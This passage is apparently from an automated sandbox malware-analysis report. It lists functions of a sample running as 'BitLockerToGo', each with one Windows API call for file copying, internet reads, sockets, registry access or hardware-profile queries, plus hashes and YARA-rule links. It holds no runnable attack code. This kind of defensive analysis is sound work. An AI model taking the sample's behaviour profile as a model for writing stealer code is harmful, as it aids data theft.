                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00492F23
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1304948518-0
                                                                                                                                                                                                                                      • Opcode ID: 0966eb5d21548d2c9d49f83e27a397749ff579bc2cdca433bb725c46f5b47232
                                                                                                                                                                                                                                      • Instruction ID: 97e951eb4f587a15097a081757ae0a5e1973b18033ac0de9d1dc83c26280b444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0966eb5d21548d2c9d49f83e27a397749ff579bc2cdca433bb725c46f5b47232
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8F01C767001098FD788CB68DC95F9973A7AFD8309B144128A406D7365EA71AD96CB48
                                                                                                                                                                                                                                      Function 0048C871 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0048C89C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1304948518-0
                                                                                                                                                                                                                                      • Opcode ID: 279374be653566a833e82de9e54c927f690f772eda294be62b458b70380c7e6a
                                                                                                                                                                                                                                      • Instruction ID: ad18d41d0589f4bb4e9acdc8841067b87b1b766c52bd590993fc67a0074eb146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 279374be653566a833e82de9e54c927f690f772eda294be62b458b70380c7e6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE06DB2B002048BC75CFF68ECA4F6A33A5EB94748B08402CA806C33D4DD209912CA5A
                                                                                                                                                                                                                                      Function 0048A36D Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 0048A398
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                                                                                      • Opcode ID: 092f4a5ede64868c8cadef3771f393dabbf4a9f8b4a93675de114d7f6c4cb4f8
                                                                                                                                                                                                                                      • Instruction ID: 2587df35862618079a7964943d15ba36bd4ea67291078764adbc8cdd7c0903ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 092f4a5ede64868c8cadef3771f393dabbf4a9f8b4a93675de114d7f6c4cb4f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62E09271340204DFD794EB6CCC80F6933E5AB8835CF040528F366D73E2C628AE528B5A
                                                                                                                                                                                                                                      Function 004895F3 Relevance: 1.5, APIs: 1, Instructions: 24filenetworkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000FFF,?), ref: 004895AA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                      • Opcode ID: fd3b4a83a112840bb3ffd9204d242133979fc3a454bcd0f8d704e66ebd6e385b
                                                                                                                                                                                                                                      • Instruction ID: 4ef6c3de1b71b3165aa4533200690204a5b1110ce85bbc881afc79c49df9b0c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd3b4a83a112840bb3ffd9204d242133979fc3a454bcd0f8d704e66ebd6e385b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE06576208201EFD385DB1CDC88F6AB3D8AB88608F180828A00AC3352C764EC00DB2A
                                                                                                                                                                                                                                      Function 0049FE65 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Enum
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2928410991-0
                                                                                                                                                                                                                                      • Opcode ID: df417b2a9ab6f661af639150a32ef1f6110edb7b3f8fab0de4f722c0715b6474
                                                                                                                                                                                                                                      • Instruction ID: 3f4eb8ac1c140729e0dd1025235eeedcee87d68d0e1ba30d7b4c05aea45fabd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df417b2a9ab6f661af639150a32ef1f6110edb7b3f8fab0de4f722c0715b6474
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F08270A183459FDB0CDF29C894569B7E1BFC8314F14C92EE89A47354F770A885CB86
                                                                                                                                                                                                                                      Function 0049F1A8 Relevance: 1.5, APIs: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,004D2DB6,00000000,00020119), ref: 0049F1DC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: 4deae1f8e292c6260a43e248d06b8d7494a4aba8cfc4815ca5fec85d5c2552e1
                                                                                                                                                                                                                                      • Instruction ID: 3e86d629789f264f71e4d7485b5d4eba6f1610eed4440d523535fa3e2bb1cb1f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4deae1f8e292c6260a43e248d06b8d7494a4aba8cfc4815ca5fec85d5c2552e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE086B5B402196FD358DF1AFC52F22735DEB51204F09007CFD05D7363D69578208958
                                                                                                                                                                                                                                      Function 00493263 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 00493298
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2029273394-0
                                                                                                                                                                                                                                      • Opcode ID: a3caa2b36ea2109c06601d7ad6b122f6caddb7e69dd8c24e5ae6f52e5cbfc865
                                                                                                                                                                                                                                      • Instruction ID: cf8a9e828ef0235027c56ee85ab460264d736f79afb8653f431ebf1e09038bd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3caa2b36ea2109c06601d7ad6b122f6caddb7e69dd8c24e5ae6f52e5cbfc865
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79F01CB2A0010E8BCB49CB58DC91FDC33B5EF58205F140128D90AD7261EA31BE158F54
                                                                                                                                                                                                                                      Function 004AC391 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32 ref: 004AC39D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 2d7b5fa1bcf4e09b0441f7357b98b689c00a59ef7c8a6eddd90be4db8038b256
                                                                                                                                                                                                                                      • Instruction ID: ea00b788f3b585d52c746b3cb2249d641e71824ca9908a504d87c42ba199cb75
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d7b5fa1bcf4e09b0441f7357b98b689c00a59ef7c8a6eddd90be4db8038b256
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E092367800049BE355C789EC90F7973A7AFC4310F2880299607D73D1CE78AC05876C
                                                                                                                                                                                                                                      Function 00489580 Relevance: 1.5, APIs: 1, Instructions: 23filenetworkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000FFF,?), ref: 004895AA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                      • Opcode ID: 726809b818e07ed319aa18af1a3fe68c69b008c06254217017d2115acf10c934
                                                                                                                                                                                                                                      • Instruction ID: 457c9c77354e98265fd67e50ffbe2b8f33231a1ed805679b9a8c9d97b791c5b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 726809b818e07ed319aa18af1a3fe68c69b008c06254217017d2115acf10c934
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00E0DF72304001EFC388DB1CDC85EAA33D9AF842087180969F80AC7361EB60ED19CB08
                                                                                                                                                                                                                                      Function 0048C924 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PathFileExistsA.SHLWAPI(00000000), ref: 0048C94F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1174141254-0
                                                                                                                                                                                                                                      • Opcode ID: 9abb83b2dab51f75c316144e10942101f596115e9f081a36f8d67076e8b1afaf
                                                                                                                                                                                                                                      • Instruction ID: e4126e89f42037ebb79746110216bb4a48560c7030371b1ff9d79df51a88df26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9abb83b2dab51f75c316144e10942101f596115e9f081a36f8d67076e8b1afaf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE012B2B002098FC788FB9DDCE4F6933E4EB55248B54003C9916D7351DA289D16DB59
                                                                                                                                                                                                                                      Function 00487751 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3050416762-0
                                                                                                                                                                                                                                      • Opcode ID: 1339c16cd11ba9d1d3222c431521ec44175ce3cda3d6148b8a4c596b6f2cfa4f
                                                                                                                                                                                                                                      • Instruction ID: 1a59e14ade3ec83918cfa7218d3050b0aaa6f49b7eeec39404aea937572fe4e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1339c16cd11ba9d1d3222c431521ec44175ce3cda3d6148b8a4c596b6f2cfa4f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CF08530E093458BC710DF69D840A2AB7F2AFD8304F19C629E89887364EA309C91CB82
                                                                                                                                                                                                                                      Function 004A2B74 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 004A2B84
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                                                                                                      • Opcode ID: 02cd96fdb271c2f4adfd17411f895942f1b439851d24ca635c45c7a4b533e007
                                                                                                                                                                                                                                      • Instruction ID: d4c30ca5c8fe47e58759b6974296bee0f9e4340676dfea971be3437b0750576a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02cd96fdb271c2f4adfd17411f895942f1b439851d24ca635c45c7a4b533e007
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FD05E723801042BE240F74FFCC1FBA33A8EB82ABCF080035F288C3280C659A8994179
                                                                                                                                                                                                                                      Function 004A1B88 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008), ref: 004A1BA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: 0e4de054d1d28f2409f4a6f544a55a3b387ac971ed1b1e94b975e5d57b500e97
                                                                                                                                                                                                                                      • Instruction ID: b5dd021f4ac21d134955bf0e3222e0144560ef85b180b3af5e4034f8ec7762ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e4de054d1d28f2409f4a6f544a55a3b387ac971ed1b1e94b975e5d57b500e97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44E0DF716002028BC304CF69DC90E1A33E4FF84300B05007DA802D3360CB34EC45CB88
                                                                                                                                                                                                                                      Function 0048C975 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 90ad110a0984449d203911245de76375e39dca416fa3a4132982f08688854f03
                                                                                                                                                                                                                                      • Instruction ID: 01e0ceda15627dd9d04ba425e4132a07b92b51cf2f34970a3587093c372a9a44
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90ad110a0984449d203911245de76375e39dca416fa3a4132982f08688854f03
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF039B1904244CBD740EF7CEC84B6977F0BB94318F144A2CE894D72A1DB3499998B5A
                                                                                                                                                                                                                                      Function 0048CAD1 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0048CAEC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 59ce40d9225bb72d38b91339095c41f8b808c740388a34fece0cf0ab988e6be2
                                                                                                                                                                                                                                      • Instruction ID: 187193dd064d0c28a4f1689fa4d57df8a95fff4f406212b0e35b300988f0e8a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59ce40d9225bb72d38b91339095c41f8b808c740388a34fece0cf0ab988e6be2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE04870B0020A9FC704EFA5CD84F96B7B6FF84644F548568D405D7159EA719807C7A4
                                                                                                                                                                                                                                      Function 004A1992 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 004A19B0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: bdacec76e5bc6bbd5e1e687547fcf8b5d6023a460d4cbcfc4169edb8925d43c3
                                                                                                                                                                                                                                      • Instruction ID: 62e6ace678dc0a01afbec4593e7a35ad45c084fd6c349597ecd0b218703eb749
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdacec76e5bc6bbd5e1e687547fcf8b5d6023a460d4cbcfc4169edb8925d43c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFE0C2BB2012509BC3108B6ADC40C5E732BFBC023032E0518E421D33E0D738E9028AA8
                                                                                                                                                                                                                                      Function 0048BD53 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0048BD73
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 76f7cf8e5a9dad9615c44c4ffe03b3bc48cac295cfb0c7f07f4949cd8d8de1e1
                                                                                                                                                                                                                                      • Instruction ID: 7e8579767d03fa7313a2c88b34d3dddfd556f19aa31235d41b61fa66f2379cb1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76f7cf8e5a9dad9615c44c4ffe03b3bc48cac295cfb0c7f07f4949cd8d8de1e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE0467A240305AFDB05DF50CCC0F2AB372FB89720B14C058EC048B266E734E811AF60
                                                                                                                                                                                                                                      Function 0049EFEF Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 0049F011
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProfile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2104809126-0
                                                                                                                                                                                                                                      • Opcode ID: 05db32d3692e6b59d2d5482531c82b885053942db3befef11ab9bcd8849947fa
                                                                                                                                                                                                                                      • Instruction ID: 341aa058e33a00a11dd394474397908fcad04f2efb6cc918905e8f3466784f8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05db32d3692e6b59d2d5482531c82b885053942db3befef11ab9bcd8849947fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAE0C2762002058BD324EF28DC90E9B7769AF97340F11842CBD4187351EB32FC088B91
                                                                                                                                                                                                                                      Function 004870A7 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000000C7,?), ref: 004870C0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                      • Opcode ID: 4236ad04c1a2cf8136c5b6341267de7ce1135800e1cbaf3d233974f2751f6570
                                                                                                                                                                                                                                      • Instruction ID: 17e895a2502a9c097c11da4260689e2d472a5be66355c41cb3bda9d2ad0f93a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4236ad04c1a2cf8136c5b6341267de7ce1135800e1cbaf3d233974f2751f6570
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C2B6700100ABEB0CC760CC25DBA3A62AF81280B24003CA40397AD0EA31A801CA00
                                                                                                                                                                                                                                      Function 00486333 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 0048634C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                      • Opcode ID: 7156b6b12441d62584f2c82f35eaad5ca4b0980e1bd6442f6a1b7ca21cc729ea
                                                                                                                                                                                                                                      • Instruction ID: bd44310044f9b9fed61a156f34e59e064c9990639a2cf90db5dfc1fa0061162f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7156b6b12441d62584f2c82f35eaad5ca4b0980e1bd6442f6a1b7ca21cc729ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBE08CB2B0020BEFEF48CF04CCD5E65B3BAAB8430872480289405DB395E671ED028B50
                                                                                                                                                                                                                                      Function 004A8E2D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DriveType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 338552980-0
                                                                                                                                                                                                                                      • Opcode ID: 5394c987070196aba49927139e30f119767c72cd0fb13b1dc3054ba843292b9f
                                                                                                                                                                                                                                      • Instruction ID: f176b8f2fdd7ecb3324276702fea65e9813ecb6581ecbb1871f926150af2634e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5394c987070196aba49927139e30f119767c72cd0fb13b1dc3054ba843292b9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6E0C279F412109FD700CF40DD85F9DB3BABBE8300F284136E6049B385EAB4AA218B48
                                                                                                                                                                                                                                      Function 00487913 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 0048792F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
